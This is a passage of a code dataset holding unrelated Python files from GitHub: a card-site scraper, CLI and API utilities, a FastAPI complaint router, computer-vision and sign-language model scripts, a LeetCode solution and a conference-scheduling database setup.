len(dd_elements)):\n\t\t\t\tname = re.findall(r'\\\">(.*)', dt_elements[i])[0]\n\t\t\t\tvalue = re.findall(r'\\\">(.*)', dd_elements[i])[0].replace(\"\", \"\").replace(\"\", \"\")\n\t\t\t\tif name == \"Rarity\":\n\t\t\t\t\tvalue = re.findall(r'data-original-title=\"(.*?)\"', value)[0]\n\t\t\t\tif name == \"Reprints\":\n\t\t\t\t\tvalue = re.findall(r' \\((.*?)\\)', value)[0]\n\t\t\t\tif name == \"Printed in\":\n\t\t\t\t\tvalue = re.findall(r'class=\"mb-2\">(.*?)', value)[0]\n\t\t\t\tout_data.append(value)\n\t\t\t\t#print(\"[\"+str(i)+\"]\"+\" \"+name+\" | \"+value)\n\t\t\tglobal output_data\n\t\t\toutput_data.append(out_data)\n\t\t\t'''\n\n\n    except Exception as exp:\n        print(\"An error occurred while trying to scrape \" + url)\n        print(\"Please note that this version was never tested on anything else than yugioh.\")\n        print(\"If you want to report the error, it is : \\n\" + str(exp))\n\n\n# Getting the HTML content of the page\n# return driver\n\ndef scrape_data(driver):\n    dl_elements = driver.find_elements_by_xpath('//dl[@class=\"labeled row mx-auto no-gutters\"]')\n\n    # Iterate over each dl element and find dt and dd within\n    data = []\n    for dl in dl_elements:\n        dt_elements = dl.find_elements_by_tag_name('dt')\n        dd_elements = dl.find_elements_by_tag_name('dd')\n\n        # Make sure we have the same number of dt and dd elements\n        assert len(dt_elements) == len(dd_elements), \"Mismatch in number of dt and dd elements\"\n\n        # Extract the text and create a list of [dt, dd] pairs\n        data.extend([[dt.text, dd.text] for dt, dd in zip(dt_elements, dd_elements)])\n    for elem in data:\n        print(elem[0] + \" : \" + elem[1])\n\n\ndef core_run(input_file, output_file, signals, signal_list):\n    global _signals\n    _signals = signals\n    _signals.emit(\"Load user agents\")\n    load_user_agents()\n    _signals.emit(\"Read input\")\n    input_data = file_to_list(input_file)\n    _signals.emit(\"Found \" + str(len(input_data)) + \" lines\")\n\n    global urls_occurrences_dictionnary\n    global total_number_of_url\n    urls_occurrences_dictionnary = {}\n    total_number_of_url = len(input_data)\n    for url in input_data:\n        if not url in urls_occurrences_dictionnary:\n            urls_occurrences_dictionnary[url] = 1\n        else:\n            urls_occurrences_dictionnary[url] += 1\n    # print(urls_occurrences_dictionnary)\n    url_list = list(urls_occurrences_dictionnary.keys())\n\n    _signals.emit(\"Reduced to \" + str(len(url_list)) + \" single lines\")\n\n    i = 1\n    total = len(url_list)\n    for single_url in url_list:\n        request(single_url, i, total)\n        i += 1\n\n    print(\"Successfully scraped \" + str(len(output_data)) + \" urls\")\n    
signal_list.emit(output_data)\n","repo_name":"DrankRock/CMScrape","sub_path":"Fix/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"75"} +{"seq_id":"41452388151","text":"\"\"\"\nExposes a command line interface for the Github module.\n\"\"\"\nimport argparse\nimport os\nimport sys\nfrom typing import Callable, List\nimport pyghub.commands.get_repo\nimport pyghub.commands.commit\nimport pyghub.commands.clone_repo\nimport pyghub.commands.pull\nimport pyghub.commands.push\n\n\n\n# Collect our subparsers from each file in commands/\ncommand_parser_map: List[Callable[[], None]] = [\n pyghub.commands.get_repo.register_subparser,\n pyghub.commands.clone_repo.register_subparser,\n pyghub.commands.commit.register_subparser,\n pyghub.commands.pull.register_subparser,\n pyghub.commands.push.register_subparser,\n]\n\ndef main():\n # First, collect global arguments (just the API token really)\n parser = argparse.ArgumentParser(description=\"Command Line Interface for working with Github's API.\")\n parser.add_argument(\"--api-token\", help=\"Github.com API token\")\n\n # Now, iterate our commands and add each one's subparser\n subparsers = parser.add_subparsers()\n for command_parser in command_parser_map:\n command_parser(subparsers)\n\n args = parser.parse_args()\n\n if not 'func' in args:\n parser.print_help()\n sys.exit(-1)\n\n # Execute the desired command and exit with its return code\n exit_code = args.func(args)\n sys.exit(exit_code)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jayspang/pyghub","sub_path":"pyghub/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73701900721","text":"# 1. Prepare a drawing function\n# 2. Load the model and connect it to the camera\n# 3. Loop over the frames from the video stream\n# 4. For each frame of the stream, the model make an inference and\n# drawing function to display the results.\n\n# a. Import required modules\nimport numpy as np\nimport cv2\nimport tensorflow.keras as K\n\n# b. Function to draw localization bounding boxes on a frame\ndef draw_box(frame:np.ndarray, box:np.ndarray) -> np.ndarray:\n '''\n Input: frame and normalized coordinates of the two corners of a bounding box,\n as an array of four numbers.\n Process: 1. reshapes the 1D array of the box into 2D array\n (first index represents the point and the second represents the x and y coordinates) \n 2. transforms the normalized coordinates to coordinates of image by multiplying with w, h\n 3. draws the green coloured bounding box\n Output: frame with bounding box\n '''\n h,w = frame.shape[0:2]\n pts = (box.reshape((2,2))*np.array([w,h])).astype(np.int)\n cv2.rectangle(frame, tuple(pts[0]), tuple(pts[1]), (0,255,0), 2)\n return frame\n\n# c. 
Import the model and connect to camera\nmodel = K.models.load_model(\"localization.h5\")\n\ncap = cv2.VideoCapture(0)\n\n# iterate over the frames from the camera,\nfor _, frame in iter(cap.read, (False, None)):\n    # resize each frame to a standard size\n    input = cv2.resize(frame, (224,224))\n    # convert frame to RGB color space\n    input = cv2.cvtColor(input, cv2.COLOR_BGR2RGB)\n\n    # normalize the image and add another dimension since the model accepts batches of images,\n    # and pass the result to the model for inference\n    box, = model.predict(input[None]/255)\n    # drawing the predicted box\n    draw_box(frame, box)\n    # display\n    cv2.imshow(\"res\", frame)\n    if(cv2.waitKey(1) == 27):\n        break","repo_name":"Krishna2709/ObjectClassification-Localization","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"20931023831","text":"import serial\nimport time\nfrom struct import *\n \nCOM=\"COM4\"\nbitRate=115200\n\nser = serial.Serial(COM, bitRate, timeout=0.1) # declare the serial port and bit rate to use\n\ndef bytes2float(data_bytes):\n    n=0\n    first = 0 \n    count = 0\n\n    for i in list(str(data_bytes)):\n        count += 1\n        if i == ';':\n            n += 1\n        if n == 7:\n            first = count\n            break\n    data_bytes = data_bytes[first-2:-6] # keep only the needed payload bytes\n    data_float = unpack('>ddd',data_bytes) # decode them\n    return data_float\n\ndef csv_write_f():\n\n    flag = True\n    filename = \"\"\n\n    def write(x,y,z):\n\n        import datetime\n        import csv\n\n        nonlocal flag\n        nonlocal filename\n\n        if flag:\n            now_time = datetime.datetime.now()\n            filename = 'test_' + now_time.strftime('%Y%m%d_%H%M%S') + '.csv'\n\n            with open(filename,'a',newline='') as f: \n                writer = csv.writer(f)\n                writer.writerow([\"x\", \"y\", \"z\"])\n            flag = False\n\n\n        with open(filename,'a',newline='') as f: \n            writer = csv.writer(f)\n            writer.writerow([x, y, z])\n\n    return write\n\ncsv_write = csv_write_f()\n\n\ntry:\n\n    while True:\n        time.sleep(0.1)\n        \n        data = ser.read_all() # receive the data (as bytes)\n\n        if data != b'':\n            print(data)\n            data = bytes2float(data) # convert the bytes to floats\n            print(data)\n            csv_write(*data)\n            data = b''\n\t\t\n\nexcept KeyboardInterrupt:\n    print('stop!')\n    ser.close()\n\n","repo_name":"okaokadadada/2022NSE","sub_path":"serial/receive_serial.py","file_name":"receive_serial.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"201469494","text":"from __future__ import annotations\n\nimport contextlib\nfrom unittest import mock\n\nimport flask\nimport pyquery\n\nfrom git_code_debt.server.app import AppContext\nfrom git_code_debt.server.metric_config import Config\nfrom testing.assertions.response import assert_no_response_errors\nfrom tests import file_diff_stat_test\n\n\ndef test_widget_frame_loads(server):\n    response = server.client.get(flask.url_for('widget.frame'))\n    assert_no_response_errors(response)\n    assert response.pq.find('script')\n\n\n@contextlib.contextmanager\ndef metrics_enabled(widget_metrics):\n    config = Config.from_data({\n        'Groups': [],\n        'CommitLinks': {},\n        'ColorOverrides': [],\n        'WidgetMetrics': widget_metrics,\n    })\n    with mock.patch.object(AppContext, 'config', config):\n        yield\n\n\ndef test_widget_data(server):\n    with metrics_enabled({'TotalLinesOfCode': {}}):\n        response = server.client.post(\n            flask.url_for('widget.data'),\n            data={'diff': file_diff_stat_test.SAMPLE_OUTPUT},\n        )\n        response_pq = 
pyquery.PyQuery(response.json['metrics'])\n assert 'TotalLinesOfCode 1' in ' '.join(response_pq.text().split())\n # Should not find any metrics with no data\n assert not response_pq.find('.metric-none')\n # Should not have metrics we didn't specify\n assert 'TotalLinesOfCode_Text' not in response_pq.text()\n\n\ndef test_widget_data_multiple_values(server):\n with metrics_enabled(\n {'TotalLinesOfCode': {}, 'TotalLinesOfCode_plain-text': {}},\n ):\n response = server.client.post(\n flask.url_for('widget.data'),\n data={'diff': file_diff_stat_test.SAMPLE_OUTPUT},\n )\n response_pq = pyquery.PyQuery(response.json['metrics'])\n assert 'TotalLinesOfCode_plain-text' in response_pq.text()\n","repo_name":"asottile/git-code-debt","sub_path":"tests/server/servlets/widget_test.py","file_name":"widget_test.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":549,"dataset":"github-code","pt":"75"} +{"seq_id":"38991651555","text":"from collections import deque\n\nclass Solution:\n def orangesRotting(self, grid: List[List[int]]) -> int:\n rotten = deque([])\n fresh = set()\n directions = [[0,-1], [-1,0], [0,1], [1,0]]\n minutes = 0\n \n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == 1:\n fresh.add((i,j))\n elif grid[i][j] == 2:\n rotten.append((i,j))\n \n inbound = lambda row, col : 0 <= row < len(grid) and 0 <= col < len(grid[0])\n \n while fresh:\n size = len(rotten)\n if size == 0:\n return -1\n \n for i in range(size):\n tup = rotten.popleft()\n for i in directions:\n a, b = tup[0] + i[0], tup[1] + i[1]\n if inbound(a, b) and grid[a][b] == 1:\n grid[a][b] = 2\n fresh.discard((a, b))\n rotten.append((a, b))\n minutes += 1\n \n return minutes\n \n \n ","repo_name":"amanz55/a2sv_competitiveprogramming","sub_path":"994-rotting-oranges/994-rotting-oranges.py","file_name":"994-rotting-oranges.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"5715461159","text":"\"\"\" This is simple module for finding first on by value. 
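run(val) reports True only on a rising edge: the first positive value seen after the previous value was zero. 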
\"\"\"\n\n# init val for previous bal\nprev = 0.0\n\ndef run (val):\n global prev\n\n if val > 0.0 and prev == 0.0:\n prev = val\n return True\n elif val == 0.0:\n reset()\n return False\n else:\n return False\n\ndef reset():\n global prev\n prev = 0.0\n\n","repo_name":"sonir/sonilabPython","sub_path":"check_new_on.py","file_name":"check_new_on.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"10697050486","text":"import math\nimport numpy as np\n\ndef func(x):\n return math.sqrt(2*x**2 + 1)\n\ndef rectagular(a, b, n):\n I = 0\n x = np.linspace(a, b, n)\n l = x[1] - x[0] \n for i in range(0, n-1):\n I += l*func(x[i])\n print(I)\n\ndef main():\n rectagular(0, 1, 1000)\n\nif __name__ == \"__main__\":\n main()","repo_name":"K1r1llLukoyanov/NumberMethods","sub_path":"numberIntegration/rectangulars.py","file_name":"rectangulars.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26531367033","text":"from typing import List\n\nfrom api.db.repository import auth, complaint\nfrom api.db.session import get_db\nfrom fastapi import APIRouter, Depends, status\nfrom fastapi_jwt_auth import AuthJWT\nfrom api.schemas.common import StatusResponse\nfrom api.schemas.complaint import (\n ComplaintCreate,\n ComplaintInfo,\n ComplaintUpdate,\n)\nfrom sqlalchemy.orm import Session\n\nrouter = APIRouter()\ndefault_session = Depends(get_db)\ndefault_authJWT = Depends()\n\n\n@router.post(\n \"/\",\n response_model=ComplaintInfo,\n status_code=status.HTTP_201_CREATED,\n)\ndef create_complaint(\n req_complaint: ComplaintCreate,\n db: Session = default_session,\n Auth: AuthJWT = default_authJWT,\n):\n \"\"\"\n Create a Complaint and store it in the database\n \"\"\"\n auth.is_only_user_permitted(db, Auth)\n\n return complaint.create(db, req_complaint)\n\n\n@router.get(\"/\", response_model=List[ComplaintInfo])\ndef get_all_complaints(\n db: Session = default_session,\n Auth: AuthJWT = default_authJWT,\n limit: int = 100,\n offset: int = 0,\n statuses: str = None,\n):\n \"\"\"\n Get all the Complaints stored in database\n \"\"\"\n auth.is_only_admin_permitted(db, Auth)\n if statuses:\n statuses = statuses.split(\",\")\n\n return complaint.get_all(db, offset, limit, statuses)\n\n\n@router.get(\"/{complaint_id}\", response_model=ComplaintInfo)\ndef get_complaint(\n complaint_id: int,\n db: Session = default_session,\n Auth: AuthJWT = default_authJWT,\n):\n \"\"\"\n Get the Complaint with the given ID\n \"\"\"\n auth.is_only_admin_permitted(db, Auth)\n\n return complaint.get_by_id(db, complaint_id)\n\n\n@router.put(\"/{complaint_id}\", response_model=ComplaintInfo)\ndef update_complaint(\n complaint_id: int,\n req_complaint: ComplaintUpdate,\n db: Session = default_session,\n Auth: AuthJWT = default_authJWT,\n):\n \"\"\"\n Update a Complaint stored in the database\n \"\"\"\n auth.is_only_admin_permitted(db, Auth)\n\n return complaint.update(db, complaint_id, req_complaint)\n\n\n@router.delete(\"/{complaint_id}\", response_model=StatusResponse)\ndef delete_complaint(\n complaint_id: int,\n db: Session = default_session,\n Auth: AuthJWT = default_authJWT,\n):\n \"\"\"\n Delete the Complaint with the given ID\n \"\"\"\n auth.is_only_admin_permitted(db, Auth)\n complaint.delete(db, complaint_id)\n\n return {\n \"success\": True,\n \"message\": \"Complaint deleted successfully\",\n 
}\n","repo_name":"mskab/ePetition","sub_path":"api/routes/complaint.py","file_name":"complaint.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"41390531678","text":"\nimport cv2\nimport numpy as np\nimport os\nfrom matplotlib import pyplot as plt\nimport mediapipe as mp\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\nfrom tensorflow.keras.utils import to_categorical\nfrom sklearn.metrics import multilabel_confusion_matrix, accuracy_score\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import LSTM, Dense\nfrom tensorflow.keras.callbacks import TensorBoard\ntf.random.set_seed(42)\n\nmp_holistic = mp.solutions.holistic # Holistic model\nmp_drawing = mp.solutions.drawing_utils # Drawing utilities\n\ndef mediapipe_detection(image, model):\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) # COLOR CONVERSION BGR 2 RGB\n image.flags.writeable = False # Image is no longer writeable\n results = model.process(image) # Make prediction\n image.flags.writeable = True # Image is now writeable \n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) # COLOR COVERSION RGB 2 BGR\n return image, results\n\ndef draw_landmarks(image, results):\n mp_drawing.draw_landmarks(image, results.face_landmarks, mp_holistic.FACEMESH_TESSELATION) # Draw face connections\n mp_drawing.draw_landmarks(image, results.pose_landmarks, mp_holistic.POSE_CONNECTIONS) # Draw pose connections\n mp_drawing.draw_landmarks(image, results.left_hand_landmarks, mp_holistic.HAND_CONNECTIONS) # Draw left hand connections\n mp_drawing.draw_landmarks(image, results.right_hand_landmarks, mp_holistic.HAND_CONNECTIONS) # Draw right hand connections\n\ndef draw_styled_landmarks(image, results):\n # Draw face connections\n mp_drawing.draw_landmarks(image, results.face_landmarks, mp_holistic.FACEMESH_TESSELATION, \n mp_drawing.DrawingSpec(color=(80,110,10), thickness=1, circle_radius=1), \n mp_drawing.DrawingSpec(color=(80,256,121), thickness=1, circle_radius=1)\n ) \n # Draw pose connections\n mp_drawing.draw_landmarks(image, results.pose_landmarks, mp_holistic.POSE_CONNECTIONS,\n mp_drawing.DrawingSpec(color=(80,22,10), thickness=2, circle_radius=4), \n mp_drawing.DrawingSpec(color=(80,44,121), thickness=2, circle_radius=2)\n ) \n # Draw left hand connections\n mp_drawing.draw_landmarks(image, results.left_hand_landmarks, mp_holistic.HAND_CONNECTIONS, \n mp_drawing.DrawingSpec(color=(121,22,76), thickness=2, circle_radius=4), \n mp_drawing.DrawingSpec(color=(121,44,250), thickness=2, circle_radius=2)\n ) \n # Draw right hand connections \n mp_drawing.draw_landmarks(image, results.right_hand_landmarks, mp_holistic.HAND_CONNECTIONS, \n mp_drawing.DrawingSpec(color=(245,117,66), thickness=2, circle_radius=4), \n mp_drawing.DrawingSpec(color=(245,66,230), thickness=2, circle_radius=2)\n ) \n \n\n\n# In[5]:\n#\n#\n# cap = cv2.VideoCapture(0)\n# # Set mediapipe model\n# with mp_holistic.Holistic(min_detection_confidence=0.5, min_tracking_confidence=0.5) as holistic:\n# while cap.isOpened():\n#\n# # Read feed\n# ret, frame = cap.read()\n#\n# # Make detections\n# image, results = mediapipe_detection(frame, holistic)\n#\n# # Draw landmarks\n# draw_styled_landmarks(image, results)\n#\n# # Show to screen\n# cv2.imshow('OpenCV Feed', image)\n#\n# # Break gracefully\n# if cv2.waitKey(10) & 0xFF == ord('q'):\n# break\n# cap.release()\n# cv2.destroyAllWindows()\n#\n#\n# # In[6]:\n#\n#\n# 
draw_landmarks(frame, results)\n# plt.imshow(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\n\n\n# # 3. Extract Keypoint Values\n\n# In[7]:\n#\n#\n# pose = []\n# for res in results.pose_landmarks.landmark:\n# test = np.array([res.x, res.y, res.z, res.visibility])\n# pose.append(test)\n# pose = np.array([[res.x, res.y, res.z, res.visibility] for res in results.pose_landmarks.landmark]).flatten() if results.pose_landmarks else np.zeros(132)\n# face = np.array([[res.x, res.y, res.z] for res in results.face_landmarks.landmark]).flatten() if results.face_landmarks else np.zeros(1404)\n# lh = np.array([[res.x, res.y, res.z] for res in results.left_hand_landmarks.landmark]).flatten() if results.left_hand_landmarks else np.zeros(21*3)\n# rh = np.array([[res.x, res.y, res.z] for res in results.right_hand_landmarks.landmark]).flatten() if results.right_hand_landmarks else np.zeros(21*3)\n# face = np.array([[res.x, res.y, res.z] for res in results.face_landmarks.landmark]).flatten() if results.face_landmarks else np.zeros(1404)\n\ndef extract_keypoints(results):\n pose = np.array([[res.x, res.y, res.z, res.visibility] for res in results.pose_landmarks.landmark]).flatten() if results.pose_landmarks else np.zeros(33*4)\n face = np.array([[res.x, res.y, res.z] for res in results.face_landmarks.landmark]).flatten() if results.face_landmarks else np.zeros(468*3)\n lh = np.array([[res.x, res.y, res.z] for res in results.left_hand_landmarks.landmark]).flatten() if results.left_hand_landmarks else np.zeros(21*3)\n rh = np.array([[res.x, res.y, res.z] for res in results.right_hand_landmarks.landmark]).flatten() if results.right_hand_landmarks else np.zeros(21*3)\n return np.concatenate([pose, face, lh, rh])\n\n#result_test = extract_keypoints(results)\n#np.save('0', result_test)\n#np.load('0.npy')\n\n\n# # 4. Setup Folders for Collection\n\n# In[8]:\n\n\n# Path for exported data, numpy arrays\n# Must have data folder connected to this notebook\n# Can be named whatever I named mine 'Data. Can be a filepath as well if you don't want to tie it to the notebook\nDATA_PATH = os.path.join('Data')\n\n# Actions that we try to detect\nactions = np.array(['hello', 'how', 'you'])\n\n# Thirty videos worth of data\nno_sequences = 30\n\n# Videos are going to be 30 frames in length\nsequence_length = 30\n\n# Folder start\nstart_folder = 30\n\n# Need to create a folder for each action with an individual folder in each action for a frame\n# The following will be inside of the Data folder you made above\n# So the data will look like this:\n# hello (this is the main folder)\n## inside the folder above we put the following folders\n# 0\n# 1\n# 2\n# 3\n# ....\n# 26\n# 27\n# 29\n# Will have 30 folders total for each action, each folder representing a frame of the action that is to be detected\nfor action in actions: \n for sequence in range(no_sequences):\n try: \n os.makedirs(os.path.join(DATA_PATH, action, str(sequence)))\n except:\n pass\n\n\n\n# # 6. 
Preprocess Data and Create Labels and Features\n\nlabel_map = {label:num for num, label in enumerate(actions)}\nprint(label_map)\n\n\nsequences, labels = [], []\nfor action in actions:\n for sequence in range(no_sequences):\n window = []\n for frame_num in range(sequence_length):\n res = np.load(os.path.join(DATA_PATH, action, str(sequence), \"{}.npy\".format(frame_num)))\n window.append(res)\n sequences.append(window)\n labels.append(label_map[action])\n\nprint(np.array(sequences).shape)\nprint(np.array(labels).shape)\n\nX = np.array(sequences)\n\nprint(X.shape)\n\ny = to_categorical(labels).astype(int)\n\n\n# In[17]:\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30)\n\n\n# In[18]:\n\n\nprint(y_test.shape)\n\n\n# # 7. Build and Train LSTM Neural Network\n\n# In[19]:\n\n\nlog_dir = os.path.join('Logs')\ntb_callback = TensorBoard(log_dir=log_dir)\n\n\n# In[20]:\n\n\nmodel = Sequential()\nmodel.add(LSTM(64, return_sequences=True, activation='relu', input_shape=(30,1662)))\nmodel.add(LSTM(128, return_sequences=True, activation='relu'))\nmodel.add(LSTM(64, return_sequences=False, activation='relu'))\nmodel.add(Dense(64, activation='relu'))\nmodel.add(Dense(32, activation='relu'))\nmodel.add(Dense(actions.shape[0], activation='softmax'))\n\n\n# In[21]:\n\n\nmodel.compile(optimizer='Adam', loss='categorical_crossentropy', metrics=['categorical_accuracy'])\n\n\n# In[23]:\n\n\nmodel.fit(X_train, y_train, epochs=1000, callbacks=[tb_callback])\n\n\n# In[24]:\n\n\nmodel.summary()\n\n\n# # 8. Make Predictions\n\n# In[25]:\n\n\nres = model.predict(X_test)\n\n\n# In[31]:\n\n\nprint(actions[np.argmax(res[2])])\n\n\n# In[32]:\n\n\nprint(actions[np.argmax(y_test[2])])\n\n\n# # 9. Save Weights\n\n# In[33]:\n\n\nmodel.save('hellohowyou.h5')\n\n\n# In[42]:\n\n# ------------------------------------------------------------------------------------------------\n#del model\n\n\n# In[8]:\n\n#\n# np.array(['hello', 'iloveyou', 'thanks'])\n# model = Sequential()\n# model.add(LSTM(64, return_sequences=True, activation='relu', input_shape=(30,1662)))\n# model.add(LSTM(128, return_sequences=True, activation='relu'))\n# model.add(LSTM(64, return_sequences=False, activation='relu'))\n# model.add(Dense(64, activation='relu'))\n# model.add(Dense(32, activation='relu'))\n# model.add(Dense(actions.shape[0], activation='softmax'))\n# model.load_weights('action.h5')\n\n# ------------------------------------------------------------------------------------------------\n# # 10. Evaluation using Confusion Matrix and Accuracy\n\n# In[34]:\n\n\nyhat = model.predict(X_test)\nprint(yhat)\n\n\n# In[35]:\n\n\nytrue = np.argmax(y_test, axis=1).tolist()\nyhat = np.argmax(yhat, axis=1).tolist()\n\n\n# In[36]:\n\n\nprint(multilabel_confusion_matrix(ytrue, yhat))\n\n\n# In[37]:\n\n\nprint(accuracy_score(ytrue, yhat))\n\n\n# # 11. Test in Real Time\n\n# In[38]:\n\n\ncolors = [(245,117,16), (117,245,16), (16,117,245)]\ndef prob_viz(res, actions, input_frame, colors):\n output_frame = input_frame.copy()\n for num, prob in enumerate(res):\n cv2.rectangle(output_frame, (0,60+num*40), (int(prob*100), 90+num*40), colors[num], -1)\n cv2.putText(output_frame, actions[num], (0, 85+num*40), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,255), 2, cv2.LINE_AA)\n \n return output_frame\n\n\n# In[39]:\n\n\n#plt.figure(figsize=(18,18))\n#plt.imshow(prob_viz(res, actions, image, colors))\n\n\n# In[41]:\n\n\n# 1. 
New detection variables\nsequence = []\nsentence = []\npredictions = []\nthreshold = 0.5\n\n# cap = cv2.VideoCapture(0)\n# # Set mediapipe model\n# with mp_holistic.Holistic(min_detection_confidence=0.5, min_tracking_confidence=0.5) as holistic:\n# while cap.isOpened():\n#\n# # Read feed\n# ret, frame = cap.read()\n#\n# # Make detections\n# image, results = mediapipe_detection(frame, holistic)\n#\n# # Draw landmarks\n# draw_styled_landmarks(image, results)\n#\n# # 2. Prediction logic\n# keypoints = extract_keypoints(results)\n# sequence.append(keypoints)\n# sequence = sequence[-30:]\n#\n# if len(sequence) == 30:\n# res = model.predict(np.expand_dims(sequence, axis=0))[0]\n# print(actions[np.argmax(res)])\n# predictions.append(np.argmax(res))\n#\n#\n# #3. Viz logic\n# if np.unique(predictions[-10:])[0]==np.argmax(res):\n# if res[np.argmax(res)] > threshold:\n#\n# if len(sentence) > 0:\n# if actions[np.argmax(res)] != sentence[-1]:\n# sentence.append(actions[np.argmax(res)])\n# else:\n# sentence.append(actions[np.argmax(res)])\n#\n# if len(sentence) > 5:\n# sentence = sentence[-5:]\n#\n# # Viz probabilities\n# image = prob_viz(res, actions, image, colors)\n#\n# cv2.rectangle(image, (0,0), (640, 40), (245, 117, 16), -1)\n# cv2.putText(image, ' '.join(sentence), (3,30),\n# cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2, cv2.LINE_AA)\n#\n# # Show to screen\n# cv2.imshow('OpenCV Feed', image)\n#\n# # Break gracefully\n# if cv2.waitKey(10) & 0xFF == ord('q'):\n# break\n# cap.release()\n# cv2.destroyAllWindows()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"adecaria/ASL-Gesture-Recognition","sub_path":"SignOn.py","file_name":"SignOn.py","file_ext":"py","file_size_in_byte":11913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73417869042","text":"import requests\nimport json\nimport time\n\n\n#Creating all variables\nAPI_TOKEN = \"\"\naccount_id = ''\nsuccess_flow = ''\n\nheaders = {\n 'app-token': API_TOKEN,\n}\n\nparams = (\n ('account_id', account_id),\n)\n\n\n#Getting all touchpoints and tasks (from 'account_id' Timeline )\ntouchpoint = requests.get('https://app.totango.com/api/v2/events', headers=headers, params=params)\ntouchpoint_data = json.loads(touchpoint.content)\n\n#Searching each individual Touchpoint and Task until the first defined 'success_flow' is found\nfor timeline_event in touchpoint_data:\n if timeline_event['properties']['activity_type_id'] == success_flow:\n #Gathers all notes from Touchpoint/Tasks, plus the epoch time (which is then converted to MM/DD/YYY)\n notes = timeline_event['note_content']['text']\n epoch = timeline_event['timestamp']\n date = time.strftime('%m-%d-%Y', time.localtime(epoch/1000))\n break\n","repo_name":"thidelrios/totango_touchpoint_search","sub_path":"totango_touchpoint.py","file_name":"totango_touchpoint.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39760289461","text":"import urllib\ndef download(url):\n print('Downloading:', url)\n # 抓取错误模块\n try:\n # 核心语句\n html = urllib.urlopen(url).read()\n except urllib.error.HTTPError as e:\n print('Download error', e.reason)\n html = None\n return html \n","repo_name":"dertaek/a-b-test-projects","sub_path":".vscode/web scraping.py","file_name":"web scraping.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9352583259","text":"'''\n This 
program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see .\n'''\n\nimport sqlite3\nimport random\nimport numpy\nimport csv\n\nclass room_class:\n\n def __init__(self, available, suitable):\n self.available = frozenset(available)\n self.suitable = frozenset(suitable)\n\n def __eq__(self, other):\n return self.available == other.available and self.suitable == other.suitable\n\n def __ne__(self, other):\n return self.available != other.available or self.suitable != other.suitable\n\n def __hash__(self):\n return hash(self.suitable) ^ hash(self.available)\n\n def __repr__(self):\n return \"available: %s, suitable %s\" % (str(self.available), str(self.suitable))\n\n\ndef setup_db(db_path, num_talks, num_hours, num_attendees, num_rsvps, distribution, sigma_ratio):\n conn = sqlite3.connect(db_path)\n c = conn.cursor()\n c.execute('DELETE FROM talks WHERE tid >= ?', (num_talks,))\n c.execute('DELETE FROM gives_talk WHERE tid >= ?', (num_talks,))\n c.execute('DELETE FROM talk_available WHERE tid >= ?', (num_talks,))\n c.execute('DELETE FROM room_suitable_for WHERE tid >= ?', (num_talks,))\n c.execute('DELETE FROM hours WHERE hid >= ?', (num_hours,))\n c.execute('DELETE FROM presenter_available WHERE hid >= ?', (num_hours,))\n c.execute('DELETE FROM room_available WHERE hid >= ?', (num_hours,))\n c.execute('DELETE FROM talk_available WHERE hid >= ?', (num_hours,))\n c.execute('DELETE FROM schedule')\n if num_attendees != None:\n c.execute('DELETE FROM attendee')\n c.execute('DELETE FROM attendee_interest')\n conn.commit()\n max_tid = c.execute('SELECT MAX(tid) FROM talks').fetchone()[0]\n tid_range = range(0, max_tid + 1)\n aid = 0\n\n if distribution.startswith('2013'):\n tdist = 0 if 'normal' in distribution else 1\n\n if 'class' in distribution:\n room_classes = {}\n rooms = {}\n for room_row in c.execute('SELECT rid, name FROM rooms').fetchall():\n rid = int(room_row[0])\n room_name = room_row[1]\n if room_name == 'Food':\n room_name = 'Food'\n rooms[rid] = room_name\n\n room_available = set()\n room_suitable = set()\n for available_row in c.execute('SELECT hid FROM room_available WHERE rid = ?', (rid,)).fetchall():\n room_available.add(int(available_row[0]))\n for suitable_row in c.execute('SELECT tid FROM room_suitable_for WHERE rid = ?', (rid,)).fetchall():\n 